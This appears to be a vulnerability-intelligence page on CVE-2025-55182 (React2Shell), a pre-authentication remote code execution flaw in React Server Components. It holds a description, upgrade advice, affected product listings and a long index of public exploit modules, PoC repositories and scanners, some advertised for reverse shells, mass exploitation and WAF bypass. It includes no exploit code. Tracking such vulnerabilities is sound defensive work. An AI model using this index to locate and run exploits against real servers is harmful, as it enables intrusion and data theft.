CVE-2025-55182

CRITICAL CISA KEV EXPLOIT POC TTE Zero-Day Pub 03/12 Upd 26/02

Overview

This vulnerability is a remote code execution flaw caused by unsafe deserialization of untrusted data. The root cause lies in the React Server Components feature, specifically in versions 19.0.0 through 19.2.0 and related packages such as react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The affected component improperly processes payloads received via HTTP requests to Server Function endpoints, leading to execution of malicious code without authentication.

Vulnerability Description

A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints.

Impact

An unauthenticated attacker can remotely execute arbitrary code on affected systems by exploiting this vulnerability, potentially gaining full system control. No user interaction or credentials are required to exploit the flaw, making it highly accessible. Successful exploitation can lead to complete compromise of the underlying server environment, exposing sensitive data, allowing lateral movement, and disrupting service availability.

Solution

Upgrade React Server Components to versions later than 19.2.0 as specified in the official Facebook security advisory. Follow detailed patch instructions available at https://www.facebook.com/security/advisories/cve-2025-55182 and https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components. Ensure all related packages including react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack are updated accordingly to mitigate the vulnerability.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

A critical pre-authentication remote code execution vulnerability has been identified in specific versions of React Server Components, including associated packages such as react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The core issue arises from the unsafe deserialization of payloads received from HTTP requests directed at Server Function endpoints. This flaw allows an attacker to manipulate the input data in such a way that they can execute arbitrary code on the server, leading to severe consequences for any application utilizing these components.

Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a malicious HTTP request that targets the vulnerable Server Function endpoints, sending specially formatted payloads that the server would then deserialize without proper validation. This could lead to the execution of arbitrary code, allowing the attacker to gain control over the server environment. Scenarios may include injecting malicious scripts that could alter application behavior, exfiltrate sensitive data, or even pivot to other systems within the network. Given the nature of the vulnerability, it is particularly concerning for applications that rely heavily on server-side rendering and dynamic content generation.

The real-world impact of this vulnerability is substantial, particularly for businesses that depend on the affected versions of React and Next.js for their web applications. The potential for remote code execution means that an attacker could compromise the integrity and confidentiality of the application, leading to data breaches, loss of customer trust, and significant financial repercussions. Organizations may face regulatory scrutiny and legal liabilities if sensitive user data is exposed or if the integrity of their systems is compromised. Additionally, the reputational damage resulting from such incidents can have long-lasting effects on customer relationships and brand perception.

To address this vulnerability, organizations should implement robust detection and mitigation strategies. Regularly updating to the latest, patched versions of the affected software is critical, as it ensures that known vulnerabilities are resolved. Employing web application firewalls (WAFs) can help filter out malicious requests before they reach the server, providing an additional layer of security. Furthermore, implementing strict input validation and sanitization practices can mitigate the risk of deserialization attacks. Continuous monitoring of application logs for unusual activity can also aid in early detection of potential exploitation attempts, allowing for a swift response to any incidents.

In conclusion, the identified vulnerability poses a significant threat to applications utilizing the affected versions of React Server Components and related packages. The potential for remote code execution through unsafe deserialization highlights the importance of secure coding practices and the need for organizations to remain vigilant in their security posture. By adopting comprehensive detection and mitigation strategies, businesses can protect themselves against the risks associated with this vulnerability and safeguard their applications from malicious actors.




CSURFACE threat intelligence has detected a discernible increase in exploitation attempts targeting CVE-2025-55182, accompanied by the publication of a new ExploitDB entry and the emergence of additional proof-of-concept tools on public repositories. This expansion of the exploit landscape signals growing adversary interest and capability to weaponize the vulnerability, particularly given its critical severity and pre-authentication remote code execution vector. Our telemetry reveals a steady upward trend in detection events, reflecting both heightened scanning activity and potentially successful intrusion attempts. The elevated EPSS score, now approaching the highest percentiles, underscores the accelerating likelihood of exploitation in the wild. Notably, ransomware groups have been linked to leveraging this vulnerability, amplifying the operational risk for organizations running affected React Server Components versions. Collectively, these developments elevate the threat level from high to critical, necessitating increased vigilance in monitoring and incident response efforts despite existing mitigations.

Affected Products (82)

Vendor Product Version CPE
facebook Facebook React 19.0.0 cpe:2.3:a:facebook:react:19.0.0:*:*:*:*:*:*:*
facebook Facebook React 19.1.0 cpe:2.3:a:facebook:react:19.1.0:*:*:*:*:*:*:*
facebook Facebook React 19.1.1 cpe:2.3:a:facebook:react:19.1.1:*:*:*:*:*:*:*
facebook Facebook React 19.2.0 cpe:2.3:a:facebook:react:19.2.0:*:*:*:*:*:*:*
vercel Vercel Next.js All cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
vercel Vercel Next.js All cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
vercel Vercel Next.js All cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
vercel Vercel Next.js All cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
vercel Vercel Next.js All cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
vercel Vercel Next.js All cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
vercel Vercel Next.js All cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
vercel Vercel Next.js 14.3.0 cpe:2.3:a:vercel:next.js:14.3.0:canary77:*:*:*:node.js:*:*
vercel Vercel Next.js 14.3.0 cpe:2.3:a:vercel:next.js:14.3.0:canary78:*:*:*:node.js:*:*
vercel Vercel Next.js 14.3.0 cpe:2.3:a:vercel:next.js:14.3.0:canary79:*:*:*:node.js:*:*
vercel Vercel Next.js 14.3.0 cpe:2.3:a:vercel:next.js:14.3.0:canary80:*:*:*:node.js:*:*
vercel Vercel Next.js 14.3.0 cpe:2.3:a:vercel:next.js:14.3.0:canary81:*:*:*:node.js:*:*
vercel Vercel Next.js 14.3.0 cpe:2.3:a:vercel:next.js:14.3.0:canary82:*:*:*:node.js:*:*
vercel Vercel Next.js 14.3.0 cpe:2.3:a:vercel:next.js:14.3.0:canary83:*:*:*:node.js:*:*
vercel Vercel Next.js 14.3.0 cpe:2.3:a:vercel:next.js:14.3.0:canary84:*:*:*:node.js:*:*
vercel Vercel Next.js 14.3.0 cpe:2.3:a:vercel:next.js:14.3.0:canary85:*:*:*:node.js:*:*
+62 additional CPEs
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

Metasploit (1)

Module Authors Rank Platform Link
Unauthenticated RCE in React Server Components (React2Shell)
exploits/multi/http/react2shell_unauth_rce_cve_2025_55182
Maksim Rogov Unknown - View

ExploitDB (1)

Title Author Type Platform Date Link
React Server 19.2.0 - Remote Code Execution danieljavanrad webapps multiple - View

GitHub PoCs (497)

Repository Author Stars Forks Date Link
assetnote/react2shell-scanner
High Fidelity Detection Mechanism for RSC/Next.js RCE (CVE-2025-55182 & CVE-2025-66478)
assetnote 2451 269 2025-12-04 View
msanft/CVE-2025-55182
Explanation and full RCE PoC for CVE-2025-55182
msanft 1426 198 2025-12-04 View
lachlan2k/React2Shell-CVE-2025-55182-original-poc
Original Proof-of-Concepts for React2Shell CVE-2025-55182
lachlan2k 1052 108 2025-12-05 View
ejpir/CVE-2025-55182-research
CVE-2025-55182 POC
ejpir 796 206 2025-12-03 View
mrknow001/RSC_Detector
Supports RSC fingerprinting and exploitation of the React component vulnerability CVE-2025-55182.
mrknow001 578 86 2025-12-05 View
emredavut/CVE-2025-55182
RSC/Next.js RCE Vulnerability Detector & PoC Chrome Extension – CVE-2025-55182 & CVE-2025-66478
emredavut 313 57 2025-12-06 View
zack0x01/CVE-2025-55182-advanced-scanner-
zack0x01 278 48 2025-12-06 View
ynsmroztas/NextRce
React Shell & Next.js RSC Exploit Tool (CVE-2025-55182)
ynsmroztas 251 58 2025-12-06 View
alptexans/RSC-Detect-CVE-2025-55182
RSC Detect CVE 2025 55182
alptexans 190 44 2026-02-25 View
pyroxenites/Nextjs_RCE_Exploit_Tool
Exploit for CVE-2025-55182 & CVE-2025-66478
pyroxenites 140 35 2025-12-05 View
fatguru/CVE-2025-55182-scanner
A non-intrusive surface scanner for CVE-2025-55182 (React Server Components RCE). Detects exposed RSC endpoints in React...
fatguru 111 18 2025-12-03 View
Rsatan/Next.js-Exploit-Tool
Next.js-Exploit-Tool 图形化综合利用工具,基于 Go 开发,一款针对 CVE-2025-55182 的独立安全评估工具。
Rsatan 117 12 2025-12-04 View
whiteov3rflow/CVE-2025-55182-poc
React2Shell Proof of Concept
whiteov3rflow 91 33 2025-12-04 View
BeichenDream/CVE-2025-55182-GodzillaMemoryShell
BeichenDream 108 10 2025-12-10 View
l4rm4nd/CVE-2025-55182
Docker poc lab for CVE-2025-55182 / CVE-2025-66478 (React2Shell) detection and exploitation
l4rm4nd 85 27 2025-12-05 View
freeqaz/react2shell
An analysis of CVE-2025-55182 and CVE-2025-66478 -- the vulnerabilities behind React2Shell. Tools, technical information...
freeqaz 66 18 2025-12-05 View
Chocapikk/CVE-2025-55182
Next.js React Server Components RCE exploit for CVE-2025-55182
Chocapikk 67 15 2025-12-05 View
dwisiswant0/CVE-2025-55182
Pre-auth RCE in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0.
dwisiswant0 59 15 2025-12-04 View
gensecaihq/react2shell-scanner
Security scanner for CVE-2025-55182 - Critical RCE vulnerability in React Server Components. Scan npm/pnpm/yarn lockf...
gensecaihq 58 7 2025-12-04 View
Spritualkb/CVE-2025-55182-exp
CVE-2025-55182 React Server Components Remote Code Execution Exploit Tool
Spritualkb 45 12 2025-12-05 View
xalgord/React2Shell
Advanced Exploitation Toolkit for Next.js Server Actions (CVE-2025-55182)
xalgord 46 5 2025-12-12 View
sumanrox/rschunter
Mass Hunting & Exploitation PoC for CVE-2025-55182 & CVE-2025-66478
sumanrox 36 10 2025-12-06 View
kavienanj/CVE-2025-55182
Step-by-step walkthrough of CVE-2025-55182 (React2Shell) by tracing React's Flight protocol internals.
kavienanj 38 1 2025-12-07 View
surajhacx/react2shellpoc
react2shell CVE-2025-55182 PoC
surajhacx 29 9 2025-12-07 View
MoLeft/React2Shell-Toolbox
A CVE-2025-55182(React2Shell) Toolbox Application
MoLeft 35 0 2025-12-13 View
RuoJi6/CVE-2025-55182-RCE-shell
Burp Suite/antsword - Interactive shell (HTTP hijack + POST + AES-256-CBC/BASE64)
RuoJi6 31 4 2025-12-05 View
momika233/CVE-2025-55182-bypass
CVE-2025-55182-bypass-waf
momika233 30 4 2026-01-08 View
ThemeHackers/CVE-2025-55182
a critical Remote Code Execution (RCE) vulnerability in React Server Components (RSC). It also includes a realistic "Lab...
ThemeHackers 22 9 2025-12-04 View
vijay-shirhatti/RSC-Detect-CVE-2025-55182
RSC Detect CVE 2025 55182
vijay-shirhatti 21 9 2025-12-20 View
shen771/Blackash-CVE-2025-55182
CVE-2025-55182
shen771 0 30 2025-12-04 View
aliclub0x00/CVE-2025-55182-POC-NEXTJS
Working proof of concept for NextJS RCE to establish a reverse shell. [React2Shell]
aliclub0x00 29 0 2025-12-05 View
tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-Suite-Extension
Burp Suite extension to detect the Next.js / React Server Components (RSC) Remote Code Execution vulnerability (CVE-2025...
tobiasGuta 24 4 2025-12-04 View
Cr4at0r/Next.js-RCE-Scanner-BurpSuite-Extension-
使用burp自动检测CVE-2025-55182 Next.js RCE 漏洞
Cr4at0r 26 1 2025-12-05 View
zack0x01/vuln-app-CVE-2025-55182
zack0x01 17 8 2025-12-06 View
cybertechajju/R2C-CVE-2025-55182-66478
🔥 React2Shell Toolkit - CVE-2025-55182 & CVE-2025-66478
cybertechajju 24 0 2025-12-07 View
MrR0b0t19/CVE-2025-55182-shellinteractive
MrR0b0t19 21 3 2025-12-04 View
theori-io/reactguard
ReactGuard provides framework- and vulnerability-detection tooling for CVE-2025-55182 (React2Shell)
theori-io 18 4 2025-12-10 View
sickwell/CVE-2025-55182
CVE-2025-55182 - React Server Components RCE Exploit & Scanner Supports external servers and CLI interface
sickwell 13 7 2025-12-03 View
BankkRoll/Quickcheck-CVE-2025-55182-React-and-CVE-2025-66478-Next.js
Script to quick check CVE-2025-55182 (React) and CVE-2025-66478 (Next.js) - Critical unauthenticated RCE vulnerabilitie...
BankkRoll 11 6 2025-12-03 View
AliHzSec/CVE-2025-55182
Critical RCE vulnerability scanner for React Server Components (CVE-2025-55182). Automated exploitation framework with m...
AliHzSec 15 1 2025-12-07 View
kOaDT/poc-cve-2025-55182
This repository contains a POC of CVE-2025-55182, a critical (CVSS score 10.0) pre-authentication remote code execution ...
kOaDT 13 3 2025-12-05 View
xcanwin/CVE-2025-55182-React-RCE
[漏洞复现] 全球首款基于RSC特性能绕过WAF检测的CVE-2025-55182 React Server RCE 漏洞 EXP。
xcanwin 15 0 2025-12-07 View
shyambhanushali/React2Shell
React2Shell is a Python-based proof-of-concept tool designed to exploit CVE-2025-55182 and CVE-2025-66478, both impactin...
shyambhanushali 13 2 2025-12-09 View
BlackTechX011/React2Shell
React2Shell: An exploitation framework for CVE-2025-55182 (Next.js/React RCE).
BlackTechX011 11 2 2025-12-22 View
zr0n/react2shell
A complete framework for exploiting the vulnerability CVE-2025-55182
zr0n 9 4 2025-12-07 View
shamo0/react2shell-PoC
Nuclei template for detecting react2shell (CVE-2025-55182 & CVE-2025-66478)
shamo0 10 3 2025-12-04 View
acheong08/CVE-2025-55182-poc
Actual CVE-2025-55182 detection and exploit. No bullshit LLMs.
acheong08 9 1 2025-12-04 View
sho-luv/React2Shell
CVE-2025-55182 security test kit: CLI scanner + Chrome extension + Nuclei templates + Docker lab.
sho-luv 8 2 2025-12-12 View
pax-k/react2shell-CVE-2025-55182-full-rce-script
React2Shell vulnerability (CVE-2025-55182 / CVE-2025-66478)
pax-k 6 4 2025-12-05 View
GelukCrab/React-Server-Components-RCE
React Server Components 远程代码执行漏洞(CVE-2025-55182)
GelukCrab 9 0 2025-12-05 View
im-ezboy/CVE-2025-55182-zoomeye
🔍 Next.js RCE Scanner (CVE-2025-55182) - Automated vulnerability scanner using Zoomeye search engine. Discovers targets ...
im-ezboy 7 2 2025-12-08 View
jctommasi/react2shellVulnApp
Deliberately vulnerable banking app for CVE-2025-55182 (React) and CVE-2025-66478 (Next.js) to learn, detect, and safely...
jctommasi 7 2 2025-12-04 View
zzhorc/CVE-2025-55182
CVE-2025-55182复现环境及RCE回显poc
zzhorc 7 2 2025-12-05 View
p3ta00/react2shell-poc
CVE-2025-55182 React2Shell PoC - Critical RCE in React Server Components / Next.js. CVSS 10.0. Error-based exfil, revers...
p3ta00 8 1 2025-12-20 View
Security-Phoenix-demo/react2shell-scanner-rce-react-next-CVE-2025-55182-CVE-2025-66478
Scanner for CVE-2025-55182 (React) and CVE-2025-66478 (Next.js) - Track and remediate a critical React Server Components...
Security-Phoenix-demo 6 3 2025-12-04 View
ejpir/CVE-2025-55182-bypass
Header bypass for CVE-2025-55182 (React Server Components RCE).
ejpir 6 3 2025-12-05 View
M4xSec/CVE-2025-55182-React2Shell-RCE-Shell
CVE-2025-55182 – React2Shell: Proof-of-Concept Remote Code Execution (RCE) exploit for Next.js apps. Features an interac...
M4xSec 8 1 2025-12-07 View
websecuritylabs/React2Shell-Library
A curated list of resources regarding CVE-2025-55182, the critical Remote Code Execution (RCE) vulnerability in React Se...
websecuritylabs 7 2 2025-12-07 View
Pizz33/CVE-2025-55182-burpscanner
基于 CVE-2025-55182 漏洞检测 burpsuite 被动扫描插件
Pizz33 8 0 2025-12-05 View
StealthMoud/CVE-2025-55182-Scanner
StealthMoud 8 0 2025-12-05 View
AdityaBhatt3010/React2Shell-CVE-2025-55182-The-Deserialization-Bug-That-Broke-the-Web
React2Shell, CVE-2025-55182, RCE Vulnerability: A critical breakdown of the unsafe deserialization flaw in React Server ...
AdityaBhatt3010 8 0 2025-12-06 View
jensnesten/React2Shell-PoC
RCE exploit PoC for CVE-2025-55182 and CVE-2025-66478 in Next.js and React Server Components with scanner and exploitati...
jensnesten 6 2 2025-12-23 View
atastycookie/CVE-2025-55182
CVE-2025-55182 - React Server Components RCE Exploit & Scanner Supports external servers and CLI interface
atastycookie 0 8 2025-12-03 View
heiheishushu/rsc_detect_CVE-2025-55182
For CVE-2025-55182 and CVE-2025-66478 Security Response
heiheishushu 7 1 2025-12-04 View
nehkark/CVE-2025-55182
PoC: CVE-2025-55182 (React) and CVE-2025-66478 (Next.js)
nehkark 7 0 2025-12-05 View
alsaut1/react2shell-lab
CVE-2025-55182 React2Shell PoC lab
alsaut1 7 0 2025-12-05 View
AdityaBhatt3010/React2Shell-CVE-2025-55182
React2Shell CVE-2025-55182: unauthenticated unsafe deserialization in React Server Components leading to reliable remote...
AdityaBhatt3010 7 0 2026-01-04 View
keklick1337/CVE-2025-55182-golang-PoC
CVE-2025-55182 React Server Components RCE - Go PoC
keklick1337 6 1 2025-12-06 View
rix4uni/CVE-2025-55182
A command-line tool for detecting CVE-2025-55182 and CVE-2025-66478 in Next.js applications using React Server Component...
rix4uni 6 1 2025-12-10 View
EynaExp/CVE-2025-55182-POC
Poc for CVE-2025-55182 (remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 1...
EynaExp 6 1 2025-12-04 View
Jenderal92/CVE-2025-55182-React2shell
CVE-2025-55182 Exploit Tool – Python 2.7 exploit for Next.js prototype pollution leading to RCE
Jenderal92 5 1 2026-05-25 View
TheStingR/ReactOOPS-WriteUp
Hack The Box Writeup for Retired Challenge ReactOOPS - Complete solution and educational guide to CVE-2025-55182/CVE-202...
TheStingR 6 0 2025-12-13 View
AsadAhmad-1337/React-2-Shell
This is a security exploit tool targeting CVE-2025-55182. It exploits a Remote Code Execution (RCE) vulnerability in Rea...
AsadAhmad-1337 6 0 2026-01-27 View
kondukto-io/vulnerable-next-js-poc
POC for React2Shell (CVE-2025-55182)
kondukto-io 5 1 2025-12-09 View
RavinduRathnayaka/CVE-2025-55182-PoC
React2Shell (CVE-2025-66478): A Python-based Proof of Concept for Critical Remote Code Execution (RCE) in Next.js Server...
RavinduRathnayaka 4 2 2025-12-18 View
chrahman/react2shell-CVE-2025-55182-full-rce-script
React2Shell vulnerability (CVE-2025-55182 / CVE-2025-66478) Full Script
chrahman 3 3 2025-12-19 View
songsanggggg/CVE-2025-55182
CVE-2025-55182 漏洞利用GUI,PoC / Exploit for CVE-2025-55182 & CVE-2025-66478
songsanggggg 1 5 2025-12-04 View
raivenLockdown/WEB-CLI_RCE_React2Shell
WEB-CLI_RCE_React2Shell is an educational PoC exploit tool for CVE-2025-55182, a critical Prototype Pollution flaw in Ne...
raivenLockdown 5 0 2025-12-12 View
ZihxS/check-react-rce-cve-2025-55182
Security scanner to detect CVE-2025-55182 & CVE-2025-66478 vulnerabilities in React Server Components (RSC) projects
ZihxS 5 0 2025-12-05 View
CirqueiraDev/MassExploit-CVE-2025-55182
CVE-2025-55182 RCE - Massive Scanner POC
CirqueiraDev 5 0 2025-12-06 View
Tiger-Foxx/exploit-react-CVE-2025-55182
This tool is a Proof of Concept (PoC) intended for security research and educational purposes only. Using this tool on s...
Tiger-Foxx 5 0 2025-12-11 View
hidden-investigations/react2shell-scanner
Precision-Based Detection of RSC/Next.js Remote Code Execution Vulnerabilities (CVE-2025-55182, CVE-2025-66478)
hidden-investigations 5 0 2025-12-14 View
rubensuxo-eh/react2shell-exploit
React2Shell-Exploit — Complete exploitation framework for CVE-2025-55182, including Python exploit, Docker vulnerable la...
rubensuxo-eh 4 1 2025-12-06 View
Updatelap/CVE-2025-55182
React2Shell Scanner
Updatelap 4 1 2025-12-26 View
MuhammadWaseem29/React2Shell_Rce-cve-2025-55182
React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0, including react-server-dom-parcel, react-server-dom...
MuhammadWaseem29 3 2 2025-12-06 View
ToritoIO/Torito-R2S
Torito React2Shell Scanner & Exploit Tool (CVE-2025-55182 / 66478)
ToritoIO 4 1 2025-12-07 View
timsonner/React2Shell-CVE-2025-55182
POC and lab setup
timsonner 3 2 2025-12-08 View
yz9yt/React2Shell-CTF
A CTF challenge based on CVE-2025-55182 Vulnerability
yz9yt 3 2 2025-12-10 View
raivenLockdown/RCE_React2Shell_ButCooler-SomeUselessUsefulThingsLMAO-
simple Proof-of-Concept (PoC) exploit for CVE-2025-55182
raivenLockdown 4 0 2025-12-12 View
xkillbit/cve-2025-55182-scanner
xkillbit 4 0 2025-12-04 View
c0rydoras/CVE-2025-55182
some notes && (somewhat?) poc-adjacent stuff for CVE-2025-55182
c0rydoras 4 0 2025-12-04 View
hualy13/CVE-2025-55182
hualy13 4 0 2025-12-05 View
grp-ops/react2shell
Lightweight scanner and Nuclei templates for identifying React and Next.js deserialization RCEs (CVE-2025-55182 / CVE-20...
grp-ops 4 0 2025-12-05 View
yanoshercohen/React2Shell_CVE-2025-55182
React2Shell (CVE-2025-55182) Exploit
yanoshercohen 4 0 2025-12-05 View
LemonTeatw1/CVE-2025-55182-exploit
This is CVE-2025-55182 exploit
LemonTeatw1 4 0 2025-12-07 View
alfazhossain/CVE-2025-55182-Exploiter
CVE-2025-55182-Exploiter Google Chrome Extension. nextjs vulnerability #nextjscve
alfazhossain 4 0 2025-12-09 View
pkrasulia/CVE-2025-55182-NextJS-RCE-PoC
Working Proof of Concept (PoC) for CVE-2025-55182 (React2Shell) - Unauthenticated Remote Code Execution in Next.js 15.0....
pkrasulia 4 0 2025-12-10 View
M0onPu15e/next.js-scanner
检测针对 CVE-2025-55182(React 服务器组件远程代码执行漏洞)的扫描器
M0onPu15e 3 1 2025-12-04 View
Cillian-Collins/CVE-2025-55182
A proof of concept exploit script for CVE-2025-55182
Cillian-Collins 3 1 2025-12-04 View
Rat5ak/CVE-2025-55182-React2Shell-RCE-POC
This repository documents research into deserialization behavior within Next.js React Server Components (RSC) using the ...
Rat5ak 3 1 2025-12-05 View
Dh4v4l8/CVE-2025-55182-poc-tool
Dh4v4l8 3 1 2025-12-07 View
xiaopeng-ye/react2shell-detector
A Chrome extension for detecting React2Shell vulnerabilities (CVE-2025-55182 & CVE-2025-66478) in web applications
xiaopeng-ye 3 1 2025-12-08 View
anuththara2007-W/CVE-2025-55182-Exploit-extension
A Chrome extension for detecting React2Shell vulnerabilities (CVE-2025-55182 & CVE-2025-66478) in web applications
anuththara2007-W 3 1 2025-12-11 View
fullhunt/react2shell-test-server
A test server for demonstrating and testing React2Shell (CVE-2025-55182) vulnerability
fullhunt 2 2 2025-12-06 View
snipevx/React2Shell-POC
React2Shell (CVE-2025-55182) POC
snipevx 2 2 2026-02-12 View
santihabib/CVE-2025-55182-analysis
santihabib 4 0 2025-12-03 View
olezhaku/react2shell-toolkit
Toolkit for CVE-2025-55182, also known as React2Shell.
olezhaku 3 0 2026-06-12 View
hexsh1dow/CVE-2025-55182
Interactive RCE exploitation tool for CVE-2025-55182 (React Server Components)
hexsh1dow 3 0 2026-04-06 View
IrsyadSEC/CVE-2025-55182-MassPayloadAttack
CVE-2025-55182 payload
IrsyadSEC 1 2 2025-12-12 View
jf0x3a/CVE-2025-55182-exploit
RCE Auto exploit for CVE-2025-55182
jf0x3a 3 0 2025-12-04 View
ihhgimhana/React2Shell-CVE-2025-55182-PoC-Reverse-Shell
This is an easy to use PoC script to exploit React2Shell-CVE-2025-55182 Nextjs vulnerability. This will help to gain a r...
ihhgimhana 3 0 2025-12-07 View
Syrins/CVE-2025-55182-React2Shell-RCE
A modern, user-friendly GUI application for detecting and exploiting the CVE-2025-55182 vulnerability in React Server Co...
Syrins 3 0 2025-12-08 View
techgaun/cve-2025-55182-scanner
techgaun 3 0 2025-12-09 View
VeilVulp/RscScan-cve-2025-55182
RscScan: Professional cross-platform vulnerability scanner for Next.js Server Actions (CVE-2025-55182). Detects critical...
VeilVulp 3 0 2025-12-10 View
VolksRat71/react2shellexploitvisualized
Interactive visualization of the React2Shell (CVE-2025-55182) RCE vulnerability with narrated animations for three audie...
VolksRat71 3 0 2025-12-11 View
TrixSec/CVE-2025-55182-Scanner
A hybrid security scanner for detecting CVE-2025-55182 in Next.js and Waku applications. Features combined static code a...
TrixSec 3 0 2025-12-13 View
hidden-investigations/react2shell-vulnlab
A modern Next.js vulnerable web app themed as a news / blog portal for CVE-2025-55182 (React) and CVE-2025-66478 (Next.j...
hidden-investigations 3 0 2025-12-13 View
MammaniNelsonD/React2P4IM0Nshell
💥Extension Tool para Auditoría y Explotación avanzada RCE/Source Leak/Dos (CVE-2025-55182/83/84) para entornos Next.js y...
MammaniNelsonD 3 0 2025-12-14 View
nxgn-kd01/react2shell-scanner
Detect CVE-2025-55182 (React2Shell) RCE vulnerability in React Server Components. Fast, accurate scanner with zero false...
nxgn-kd01 3 0 2025-12-04 View
ZemarKhos/CVE-2025-55182-Exploit-PoC-Scanner
ZemarKhos 2 1 2025-12-05 View
l0n3m4n/CVE-2025-55182-Waf
CVE-2025-55182 RCE vulnerability in Next.js/React RSC servers (exploit and scanner)
l0n3m4n 2 1 2025-12-06 View
guiimoraes/react2shell-evolved
A evolved version of assetnote CVE-2025-55182 scanner
guiimoraes 2 1 2025-12-24 View
InferiorAK/CVE-2025-55182-React2Shell-Async-Scanner
Async RCE scanner for CVE-2025-55182 / CVE-2025-66478 — prototype-pollution → code execution via React Server Actions.
InferiorAK 2 1 2026-02-28 View
alessiodos/react2shell-scanner
CVE-2025-55182 & CVE-2025-66478 Detection Tool for Next.js RSC RCE
alessiodos 1 2 2025-12-06 View
hoosin/CVE-2025-55182
hoosin 3 0 2025-12-05 View
AggressiveUser/React2Hell
[React2Hell] Next.js/React Server RCE Exploit — CVE-2025-55182
AggressiveUser 3 0 2025-12-08 View
cyberleelawat/CVE-2025-55182
A critical Remote Code Execution (RCE) vulnerability affecting the React Server Components (RSC) implementation within m...
cyberleelawat 1 1 2025-12-07 View
kk12-30/CVE-2025-55182
CVE-2025-55182
kk12-30 1 1 2025-12-04 View
oscarmine/R2SAE
Firefox extension to detect and exploit CVE-2025-55182 - Prototype Pollution RCE in Next.js React Server Actions
oscarmine 2 0 2025-12-10 View
sudo-Yangziran/CVE-2025-55182POC
sudo-Yangziran 2 0 2025-12-04 View
oways/React2shell-CVE-2025-55182-checker
oways 2 0 2025-12-04 View
CymulateResearch/React2Shell-Scanner
React2Shell Scanner (CVE-2025-55182 & CVE-2025-66478)
CymulateResearch 2 0 2025-12-04 View
Saturate/CVE-2025-55182-Scanner
A bash scanner for detecting CVE-2025-55182 vulnerability in Next.js applications
Saturate 2 0 2025-12-05 View
logesh-GIT001/CVE-2025-55182
"One crafted HTTP request can compromise your entire server." — React Security Team, Dec 2025
logesh-GIT001 2 0 2025-12-05 View
kindone09/CVE-2025-55182
kindone09 2 0 2025-12-05 View
rapticore/ore_react2shell_scanner
CVE-2025-55182 (React2Shell) Scanner
rapticore 2 0 2025-12-06 View
cypholab/evilact
Fast scanner for detecting and confirming Next.js RCE vulnerabilities (CVE-2025-55182 & CVE-2025-66478).
cypholab 2 0 2025-12-06 View
Archerkong/CVE-2025-55182
CVE-2025-55182 poc
Archerkong 2 0 2025-12-06 View
philparzer/nextjs-react2shell-detect
chrome extension to detect next.js sites vulnerable to CVE-2025-55182 (react2shell)
philparzer 2 0 2025-12-06 View
zamdevio/r2s
Advanced security testing tool for CVE-2025-55182 vulnerability assessment in Next.js applications. Features interactive...
zamdevio 2 0 2025-12-06 View
SainiONHacks/CVE-2025-55182-Scanner
A standalone GUI tool to detect and demonstrate the **React Server Components Remote Code Execution (RCE)** vulnerabilit...
SainiONHacks 2 0 2025-12-07 View
LucasPDiniz/CVE-2025-55182
React2Shell Vulnerability
LucasPDiniz 2 0 2025-12-08 View
Security-Phoenix-demo/react2shell-scanner-CVE-2025-55182
React2shell-web-scanner
Security-Phoenix-demo 2 0 2025-12-08 View
vulncheck-oss/cve-2025-55182
VulnCheck CVE-2025-55182 react2shell
vulncheck-oss 2 0 2025-12-08 View
joelvaiju/react2shell-CVE-2025-55182-poc
a simple react2shell poc with basic waf bypass
joelvaiju 2 0 2025-12-09 View
dr4xp/react2shell
A critical vulnerability in React Server Components affecting React 19 (CVE-2025-55182) and frameworks that use it like ...
dr4xp 2 0 2025-12-09 View
Nkwenti-Severian-Ndongtsop/POC_react2shell_CVE-2025-55182
Nkwenti-Severian-Ndongtsop 2 0 2025-12-11 View
sangleshubham/React-Security-CVE-2025-55182-Exploit
NodeJS-based exploit script and scanner for the React Server Components "React2Shell" vulnerability (CVE-2025-55182).
sangleshubham 2 0 2025-12-13 View
subhdotsol/CVE-2025-55182
This project provides a fully functional demonstration of CVE-2025-55182 (React2Shell) - a critical Remote Code Executio...
subhdotsol 2 0 2025-12-15 View
ceh-aditya-raj/CVE-2025-55182
Proof-of-concept research tool for CVE-2025-55182, a critical unauthenticated RCE in Next.js App Router caused by server...
ceh-aditya-raj 2 0 2025-12-17 View
lucyz1125/CVE-2025-55182-Next.js-RCE
Nextjs RCE Exploit
lucyz1125 2 0 2026-01-05 View
Faithtiannn/CVE-2025-55182
CVE-2025-55182漏洞检测工具
Faithtiannn 2 0 2026-01-11 View
MemerGamer/CVE-2025-55182
CVE-2025-55182
MemerGamer 2 0 2026-01-22 View
Sairbo/Unihackers---CVE-2025-55182-
Sairbo 2 0 2026-01-23 View
MuhammadUwais/React2Shell
A Firefox extension for detecting React2Shell vulnerabilities (CVE-2025-55182 & CVE-2025-66478) in web applications.
MuhammadUwais 2 0 2026-02-03 View
Atlantis02-sec/Vulnerability-assessment
nmap nse for detecting React2Shell (CVE-2025-55182)
Atlantis02-sec 1 1 2025-12-05 View
f0xyx/CVE-2025-55182-Scanner
Security scanner for CVE-2025-55182 - Critical RCE vulnerability in React Server Components
f0xyx 1 1 2025-12-05 View
greenheadHQ/CVE-2025-55182
greenheadHQ 1 1 2025-12-06 View
rsch-io/CVE-2025-55182-React2Shell
